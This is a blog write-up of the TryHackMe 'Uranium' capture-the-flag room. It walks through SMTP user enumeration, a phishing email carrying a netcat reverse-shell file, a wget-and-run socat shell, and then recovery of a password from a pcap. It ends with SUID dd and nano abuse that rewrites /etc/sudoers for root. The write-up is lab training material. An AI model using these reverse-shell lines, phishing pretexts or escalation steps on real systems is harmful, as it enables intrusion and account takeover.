Siunam's Website

My personal website

Home About Blog Writeups Projects E-Portfolio

Uranium CTF | Feb 20, 2023

Introduction

Welcome to my another writeup! In this TryHackMe Uranium CTF room, you’ll learn: Phishing, social engineering and more! Without further ado, let’s dive in.

Table of Content

  1. Service Enumeration
  2. Initial Foothold: Phishing
  3. Privilege Escalation: hakanbey to kral4
  4. Privilege Escalation: kral4 to root
  5. Conclusion

Background

Uranium CTF

Difficulty: Hard


We have reached out a account one of the employees hakanbey

In this room, you will learn about one of the phishing attack methods. I tried to design a phishing room (cronjobs and services) as much as I could.

Special Thanks to kral4 for helping us to make this room

Note: Please do not attack the given twitter account.

Service Enumeration

In this room’s description, it gave us one of their employees’ twitter account.

Let’s enumerate his account!

In here, we see there is a domain for this room’s company!

So, we can send an application file (filename: "application") to user hakanbey mail account. Then, he’ll open and review all applications one by one!

Armed with above information, we can try to phish user hakanbey, which will then gain initial foothold?

As usual, scan the machine for open ports via rustscan!

Rustscan:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:23:46(HKT)]
└> export RHOSTS=10.10.180.31  
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:23:57(HKT)]
└> rustscan --ulimit 5000 -b 4500 -t 2000 --range 1-65535 $RHOSTS -- -sC -sV -oN rustscan/rustscan.txt
[...]
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a13cd7e9d0854033d507163208633105 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMwJfFdIx+ajk4m+SaA9FCONx/arQgXZx22oViZpzp6QSuMYI3u4GXubPf+P/1AKjrdTZ2UtLt3HszSNuf3V/RMQgvXYrPGFmClvfnZZ88an/oz38l4aGTnZ1LJ8upLU90METx4YXcA9uM3u0dECXfUMqFHX+wwFxP/WKUJ7lX3Ae7H+Uj2Bwrw76d8Ndwf3a/EDZ6gTzYTgrgprZQeBbriJM9yrjljakLNCajdDzjtDSQs+wXwme2MXx8u7aAZ4ofL7cuGxCPil2R92HWrKomMQ7Iyd9SMre3rCLhSOhbYnJGTwl3P6fEqCPqp2shMO2AYVrgz0jC6ou8iM3jGe4t
|   256 24810c3a9155a0659e36587151136c34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBZPRLpPW1xp0xWpgkGvpFwR6tKPTMRvjkAbiwoPC/qCKUYg2p06XDFCMHNDmuqIC5SHvnqZqM0EdwJIuUkFvIE=
|   256 c2942b0d8ea953f6ef34dbf1436cc17e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFY55KAy8LZ+FNH0gc/IzoPlL/gQDwtvUMTzmQTd8MAj
25/tcp open  smtp    syn-ack Postfix smtpd
|_smtp-commands: uranium, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=uranium
| Subject Alternative Name: DNS:uranium
| Issuer: commonName=uranium
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-09T21:40:53
| Not valid after:  2031-04-07T21:40:53
| MD5:   293dbef32fee6092c0d72a67ea27367c
| SHA-1: 0a0c26e0ae3c723e538d3c216b40c84cf9e78fdb
| -----BEGIN CERTIFICATE-----
| MIIC0zCCAbugAwIBAgIUIVXdlC2OCz8mRhqtv01MouzQ0ZswDQYJKoZIhvcNAQEL
| BQAwEjEQMA4GA1UEAwwHdXJhbml1bTAeFw0yMTA0MDkyMTQwNTNaFw0zMTA0MDcy
| MTQwNTNaMBIxEDAOBgNVBAMMB3VyYW5pdW0wggEiMA0GCSqGSIb3DQEBAQUAA4IB
| DwAwggEKAoIBAQCpxCDhZoI2WVRkeoeXHBA1Y3LnA0WNjAnH1HyeYwzhKeVekmip
| m3bzvH0e3Z9D9zyf1mnhYnV4i4yA8I+Jp/Cx1Gc9VXvD2cAW4azHdCZBjR6arGCF
| 14gxtdrgiBSdKoMqUo2T9tlfqfnrGOTcc70KYXBJ6tjIHPrFmeXRUvlZWhsF0i1R
| zWqWLNB3Wy7O2yYP2SV8MLjoEGi2ZeqSMbYkhMKTbS7VSLNISO9ax2Wxb5j5lELX
| jLox6/nPueJkLR37YbjDztdZ3Lpz8FXUqymz+OWZq2MLYfde2Zn7cA7zFgeCfOJM
| HhGN9BC046EBW60RVFhWaczTHsRALnWvQ5VfAgMBAAGjITAfMAkGA1UdEwQCMAAw
| EgYDVR0RBAswCYIHdXJhbml1bTANBgkqhkiG9w0BAQsFAAOCAQEAj1F/S1v2EFAL
| H1FG/SWNlqsD9KKwUDSceiHicEz8IE9YU+Vg1NRxluYYpkDbfyrCVBPW//JZJNd2
| jpCObLaQRxZ/4QCa+t4/7Nlue8IiWzax8nEVMUV8clFGlBmktfsx7d/iyjDeGq2H
| VE3p6nFpZFmGmCvYfue9IcZWduFbOIWzf2XvnGnaHxYvccBry7tFGW5F93i3asV3
| UQqT8xZ+eaxzijdoEl9klp/Ee4R2b8bjHMDt7SFzvQAGzL3j1mFPY9qA78K9eNv3
| vHgqdChT9jryHVBEcLiTTPsfNRcARQeOr4O0wGdlQX6E3FRbPn3JpM96Do8+/kJd
| r/RWkJhbQQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Uranium Coin
Service Info: Host:  uranium; OS: Linux; CPE: cpe:/o:linux:linux_kernel

According to rustscan result, we have 3 ports are opened:

Open Ports Service
22 OpenSSH 7.6p1 Ubuntu
25 Postfix smtpd
80 Apache httpd 2.4.29 ((Ubuntu))

Since we found a domain in user hakanbey’s twitter account, we can add that to /etc/hosts:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:24:40(HKT)]
└> echo "$RHOSTS uranium.thm" | sudo tee -a /etc/hosts

SMTP on Port 25

In here, we can use nc to connect to the mail server, and enumerate users:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:30:55(HKT)]
└> nc -nv $RHOSTS 25
(UNKNOWN) [10.10.180.31] 25 (smtp) open
220 uranium ESMTP Postfix (Ubuntu)
VRFY hakanbey
252 2.0.0 hakanbey
VRFY test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table

We can confirm there is a user called hakanbey.

Also, we can send an evil application to him according to hakanbey’s twitter account.

However, before we do that, let’s keep enumerate.

HTTP on Port 80

Home page:

This page seems empty, let’s enumerate hidden directories and files via gobuster:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:38:19(HKT)]
└> gobuster dir -u http://uranium.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 100
[...]
/images               (Status: 301) [Size: 311] [--> http://uranium.thm/images/]
/assets               (Status: 301) [Size: 311] [--> http://uranium.thm/assets/]
/server-status        (Status: 403) [Size: 276]
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:41:08(HKT)]
└> gobuster dir -u http://uranium.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -t 100 
[...]
/index.html           (Status: 200) [Size: 10351]
/LICENSE.txt          (Status: 200) [Size: 17128]
/.htaccess            (Status: 403) [Size: 276]
/.                    (Status: 200) [Size: 10351]
/.html                (Status: 403) [Size: 276]
/README.txt           (Status: 200) [Size: 771]
/.htpasswd            (Status: 403) [Size: 276]
/.htm                 (Status: 403) [Size: 276]
/.htpasswds           (Status: 403) [Size: 276]
/.htgroup             (Status: 403) [Size: 276]
/.htaccess.bak        (Status: 403) [Size: 276]
/.htuser              (Status: 403) [Size: 276]
/.ht                  (Status: 403) [Size: 276]
/.htc                 (Status: 403) [Size: 276]
/.htaccess.old        (Status: 403) [Size: 276]
/.htacess             (Status: 403) [Size: 276]

Nothing stands out.

Then fuzz subdomains via ffuf:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|09:47:57(HKT)]
└> ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://uranium.thm/ -H "Host: FUZZ.uranium.thm" -fw 428 -t 100 
[...]

Again, nothing…

Initial Foothold

Hmm… Let’s go back to SMTP.

In SMTP, we can send a mail.

Let’s try to send an application mail with a Bash reverse shell!

According to HackTricks, we can send via sendEmail Linux command:

root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Armed with above information, let’s first create an “application” file, which is a Netcat reverse shell:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|16:13:17(HKT)]
└> echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.70.81 443 >/tmp/f' > application

Next, setup a nc listener:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|16:22:00(HKT)]
└> sudo nc -lnvp 443
listening on [any] 443 ...

Then, send the mail:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|16:30:44(HKT)]
└> sendEmail -t hakanbey@uranium.thm -f siunam@gmail.com -s uranium.thm -u "Application Request" -a application -o tls=no
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

Dear Uranium Coin,

I am writing to apply for the job at your cryptocurrency company. I am confident that my skills and experience make me an ideal candidate for this position. Please find my attached CV, which outlines my qualifications and accomplishments.

I am excited about the opportunity to work at your company and would welcome the chance to discuss more about how I can help bring success.

Thank you for your time and consideration.

Sincerely,
siunam
Feb 10 16:31:32 earth sendEmail[61642]: Message input complete.
Feb 10 16:31:34 earth sendEmail[61642]: Email was sent successfully!

Fun fact: The body message is generated via AI:

After that, wait for a while and you should get a reverse shell:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.10|16:22:00(HKT)]
└> sudo nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.70.81] from (UNKNOWN) [10.10.180.31] 39422
bash: cannot set terminal process group (1707): Inappropriate ioctl for device
bash: no job control in this shell
hakanbey@uranium:~$ whoami;hostname;id;ip a
whoami;hostname;id;ip a
hakanbey
uranium
uid=1000(hakanbey) gid=1000(hakanbey) groups=1000(hakanbey)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:be:8f:48:ed:61 brd ff:ff:ff:ff:ff:ff
    inet 10.10.180.31/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2189sec preferred_lft 2189sec
    inet6 fe80::be:8fff:fe48:ed61/64 scope link 
       valid_lft forever preferred_lft forever

I’m user hakanbey!

Stable shell via socat:

┌[siunam♥earth]-(/opt/static-binaries/binaries/linux/x86_64)-[2023.02.17|15:31:42(HKT)]-[git://master ✗]
└> python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:31:27(HKT)]
└> socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:4444
2023/02/17 15:32:28 socat[30122] N opening character device "/dev/pts/2" for reading and writing
2023/02/17 15:32:28 socat[30122] N listening on AF=2 0.0.0.0:4444
hakanbey@uranium:~$ wget http://10.8.70.81:8000/socat -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat TCP:10.8.70.81:4444 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:31:27(HKT)]
└> socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:4444
2023/02/17 15:32:28 socat[30122] N opening character device "/dev/pts/2" for reading and writing
2023/02/17 15:32:28 socat[30122] N listening on AF=2 0.0.0.0:4444
                                                                 2023/02/17 15:32:55 socat[30122] N accepting connection from AF=2 10.10.180.31:40346 on AF=2 10.8.70.81:4444
                                                                  2023/02/17 15:32:55 socat[30122] N starting data transfer loop with FDs [5,5] and [7,7]
                                              hakanbey@uranium:~$ 
hakanbey@uranium:~$ export TERM=xterm-256color
hakanbey@uranium:~$ stty rows 22 columns 107
hakanbey@uranium:~$ ^C
hakanbey@uranium:~$ 

user1.txt:

hakanbey@uranium:~$ cat /home/hakanbey/user_1.txt
thm{Redacted}

Privilege Escalation

hakanbey to kral4

Let’s do some basic enumerations!

System users:

hakanbey@uranium:~$ cat /etc/passwd | grep '/bin/bash'
root:x:0:0:root:/root:/bin/bash
hakanbey:x:1000:1000:hakanbey:/home/hakanbey:/bin/bash
kral4:x:1001:1001:,,,:/home/kral4:/bin/bash
web:x:1002:1002:,,,:/home/web:/bin/bash

SUID binaries:

hakanbey@uranium:~$ find / -perm -4000 2>/dev/null
[...]
/bin/dd

The /bin/dd looks sussy!

hakanbey@uranium:~$ ls -lah /bin/dd
-rwsr-x--- 1 web kral4 75K Apr 23  2021 /bin/dd

However, it’s only executable via user web and group kral4… User hakanbey can’t execute it.

Listening ports:

hakanbey@uranium:~$ netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:1234          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::25                   :::*                    LISTEN      -                   
udp        0      0 10.10.180.31:68          0.0.0.0:*                           -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

Try to reach it:

hakanbey@uranium:~$ curl -s http://127.0.0.1:1234/
NOT AUTHORIZED

Hmm… “NOT AUTHORIZED”?

hakanbey home directory:

hakanbey@uranium:~$ ls -lah
total 100K
drwxr-xr-x 7 hakanbey hakanbey 4.0K May  4  2021 .
drwxr-xr-x 4 root     root     4.0K Apr 23  2021 ..
lrwxrwxrwx 1 root     root        9 Apr 25  2021 .bash_history -> /dev/null
-rw-r--r-- 1 hakanbey hakanbey  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 hakanbey hakanbey 3.7K Apr  4  2018 .bashrc
drwx------ 2 hakanbey hakanbey 4.0K Apr  9  2021 .cache
-rwxrwxr-x 1 hakanbey hakanbey  49K Apr  9  2021 chat_with_kral4
drwxr-x--- 3 hakanbey hakanbey 4.0K Apr 10  2021 .config
drwx------ 4 hakanbey hakanbey 4.0K Apr 10  2021 .gnupg
drwxrwxr-x 3 hakanbey hakanbey 4.0K Apr  9  2021 .local
drwxrwxr-x 2 hakanbey hakanbey 4.0K Feb 10 08:43 mail_file
-rw-r--r-- 1 hakanbey hakanbey  807 Apr  4  2018 .profile
-rw-rw-r-- 1 hakanbey hakanbey   66 Apr  9  2021 .selected_editor
-rw-r--r-- 1 hakanbey hakanbey    0 Apr  9  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 hakanbey hakanbey   38 Apr 10  2021 user_1.txt

What’s chat_with_kral4?

hakanbey@uranium:~$ file chat_with_kral4
chat_with_kral4: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3cf57a90a14e7b2771cb14cd9b1837fe9fa7495b, for GNU/Linux 3.2.0, not stripped

It’s an ELF 64-bit executable, and it’s not stripped.

Let’s use strings to list all the strings inside it:

hakanbey@uranium:~$ strings chat_with_kral4 

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

Nope. Let’s transfer the binary then:

hakanbey@uranium:~$ python3 -m http.server 8000
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:34:44(HKT)]
└> wget http://$RHOSTS:8000/chat_with_kral4
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:34:55(HKT)]
└> chmod +x chat_with_kral4
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:36:32(HKT)]
└> strings chat_with_kral4
[...]
 while calling a Python object
NULL result without error in PyObject_Call
client.c
globals != NULL
tstate != NULL
__pyx_pyframe_localsplus_offset
Interpreter change detected - this module can only be loaded into one interpreter per process.
[...]
connection terminated
kral4 disconnected
cline_in_traceback
Connection Refused
sendnreceive
SOCK_STREAM
client.pyx
127.0.0.1
username
msg2send
hakanbey:
PASSWORD :
recvmsg
connect
AF_INET
socket
__import__
[...]

However, it doesn’t have any password string in there…

Also, looks like the binary is compiled in Python called pyx?

I used Ghidra try to reverse engineer it, but no dice.

Alright, let’s take a step back.

After keep enumerating, I found a pcap file:

hakanbey@uranium:~$ ls -lah /var/log/
[...]
-rw-r--r--   1 root      root            1.9K Apr 24  2021 hakanbey_network_log.pcap
[...]

Let’s transfer it!

hakanbey@uranium:/var/log$ python3 -m http.server 8000
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:48:47(HKT)]
└> wget http://$RHOSTS:8000/hakanbey_network_log.pcap      
┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:56:26(HKT)]
└> file hakanbey_network_log.pcap 
hakanbey_network_log.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)

A pcap file, is a file that captures all the packets’ traffics.

We can open it via WireShark:

┌[siunam♥earth]-(~/ctf/thm/ctf/Uranium-CTF)-[2023.02.17|15:56:43(HKT)]
└> wireshark hakanbey_network_log.pcap

In here, we see there are 20 packets.

In WireShark, we can follow TCP streams:

Boom! We found the password for the chat app!

Since we have the correct password, let’s use that chat app!

hakanbey@uranium:/var/log$ cd ~
hakanbey@uranium:~$ ./chat_with_kral4 
PASSWORD :{Redacted}
kral4:hi hakanbey

->

As you can see, the user kral4 sent a message to us.

Based on the conversation in the pcap file, user hakanbey forgot his password, and user kral4 will send it to hakanbey.

Let’s continue the conversation!

->hi
hakanbey:hi
kral4:how are you?

->I'm good!
hakanbey:I'm good!
kral4:what now? did you forgot your password again

->

Now, if I say “yes”, will kral4 give us the password?

->yes 
hakanbey:yes
kral4:okay your password is {Redacted} don't lose it PLEASE
kral4:i have to go
kral4 disconnected

connection terminated

Nice!!

Now we have user hakanbey’s password!

Let’s check out Sudo permission:

hakanbey@uranium:~$ sudo -l
[sudo] password for hakanbey: 
Matching Defaults entries for hakanbey on uranium:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hakanbey may run the following commands on uranium:
    (kral4) /bin/bash

Oh! User hakanbey can run /bin/bash as user kral4!

Let’s spawn a bash shell as user kral4!

hakanbey@uranium:~$ sudo -u kral4 /bin/bash
kral4@uranium:~$ whoami;hostname;id;ip a
kral4
uranium
uid=1001(kral4) gid=1001(kral4) groups=1001(kral4)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:c5:fc:b9:fc:6f brd ff:ff:ff:ff:ff:ff
    inet 10.10.180.31/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2865sec preferred_lft 2865sec
    inet6 fe80::c5:fcff:feb9:fc6f/64 scope link 
       valid_lft forever preferred_lft forever

I’m kral4!

user2.txt:

kral4@uranium:~$ cat /home/kral4/user_2.txt 
thm{Redacted}

kral4 to root

According to the enumeration result in user hakanbey session, we found /bin/dd binary has a SUID sticky bit, and it’s owned by user web:

kral4@uranium:~$ ls -lah /bin/dd
-rwsr-x--- 1 web kral4 75K Apr 23  2021 /bin/dd

That being said, we could escalate our privilege to user web!

According to GTFOBins, we can write and read any file as user web:

web_flag.txt:

kral4@uranium:~$ /bin/dd if=/var/www/html/web_flag.txt
thm{Redacted}
[...]

However, there’s nothing we can do to escalate privilege to user web beside reading the flag…

In /var/mail, we can see there are 2 mail files:

kral4@uranium:~$ ls -lah /var/mail/
total 16K
drwxrwsr-x  2 root     mail 4.0K Feb 17 08:26 .
drwxr-xr-x 14 root     root 4.0K Apr  9  2021 ..
-rw-------  1 hakanbey mail  938 Feb 17 08:26 hakanbey
-rw-------  1 kral4    mail 1.1K Apr 24  2021 kral4

Let’s read kral4’s mail!

kral4@uranium:~$ cat /var/mail/kral4 
[...]
From: "root@uranium.thm" <root@uranium.thm>
To: "kral4@uranium.thm" <kral4@uranium.thm>
[...]
I give SUID to the nano file in your home folder to fix the attack on our  index.html. Keep the nano there, in case it happens again.
[...]

So, there’s a SUID nano binary in kral4 home directory?

kral4@uranium:~$ cd /home/kral4/
kral4@uranium:/home/kral4$ ls -lah
total 140K
drwxr-x--- 3 kral4 kral4 4.0K May  4  2021 .
drwxr-xr-x 4 root  root  4.0K Apr 23  2021 ..
lrwxrwxrwx 1 root  root     9 Apr 25  2021 .bash_history -> /dev/null
-rw-r--r-- 1 kral4 kral4  220 Apr  9  2021 .bash_logout
-rw-r--r-- 1 kral4 kral4 3.7K Apr  9  2021 .bashrc
-rwxr-xr-x 1 kral4 kral4 108K Apr  9  2021 chat_with_hakanbey
-rw-r--r-- 1 kral4 kral4    5 Feb 17 08:08 .check
drwxrwxr-x 3 kral4 kral4 4.0K Apr 10  2021 .local
-rw-r--r-- 1 kral4 kral4  807 Apr  9  2021 .profile
-rw-rw-r-- 1 kral4 kral4   38 Apr 10  2021 user_2.txt

Hmm… Maybe we need to copy the nano binary?

kral4@uranium:/home/kral4$ cp /bin/nano .
kral4@uranium:/home/kral4$ ls -lah nano 
-rwxr-xr-x 1 kral4 kral4 241K Feb 17 08:31 nano

Oh! Since we have SUID permission in /bin/dd, we can just modify the index.html!

kral4@uranium:/home/kral4$ echo "hacked" | /bin/dd of=/var/www/html/index.html
[...]

kral4@uranium:/home/kral4$ 
You have new mail in /var/mail/kral4

kral4@uranium:/home/kral4$ cat /var/mail/kral4
[...]
From: "root@uranium.thm" <root@uranium.thm>
To: "kral4@uranium.thm" <kral4@uranium.thm>
Subject: Hi Kral4
[...]
I think our index page has been hacked again. You know how to fix it, I am giving authorization.
[...]
kral4@uranium:/home/kral4$ ls -lah nano 
-rwsrwxrwx 1 root root 241K Feb 17 08:31 nano

Nice! We now have SUID sticky bit on binary nano!

Also, it’s owned by root!

That being said, we can escalate our privilege to root by modifing /etc/sudoers!

kral4@uranium:/home/kral4$ /home/kral4/nano /etc/sudoers

kral4@uranium:/home/kral4$ sudo -l
Matching Defaults entries for kral4 on uranium:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kral4 may run the following commands on uranium:
    (root) NOPASSWD: /bin/bash

Boom! We can spawn a Bash shell as root!

kral4@uranium:/home/kral4$ sudo /bin/bash
root@uranium:/home/kral4# whoami;hostname;id;ip a
root
uranium
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:c5:fc:b9:fc:6f brd ff:ff:ff:ff:ff:ff
    inet 10.10.180.31/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2609sec preferred_lft 2609sec
    inet6 fe80::c5:fcff:feb9:fc6f/64 scope link 
       valid_lft forever preferred_lft forever

I’m root! :D

Rooted

root.txt:

root@uranium:/home/kral4# cat /root/root.txt 
thm{Redacted}

Conclusion

What we’ve learned:

  1. OSINT (Open-source intelligence) In Twitter
  2. Sending A Phishing Email To Gain Initial Foothold
  3. Leaking Password Via Social Engineering
  4. Horizontal Privilege Escalation via Misconfigurated Sudo Permission
  5. Analyzing Traffics Via WireShark In A pcap File
  6. Read & Write Files Via SUID dd Binary
  7. Vertical Privilege Escalation via SUID nano Binary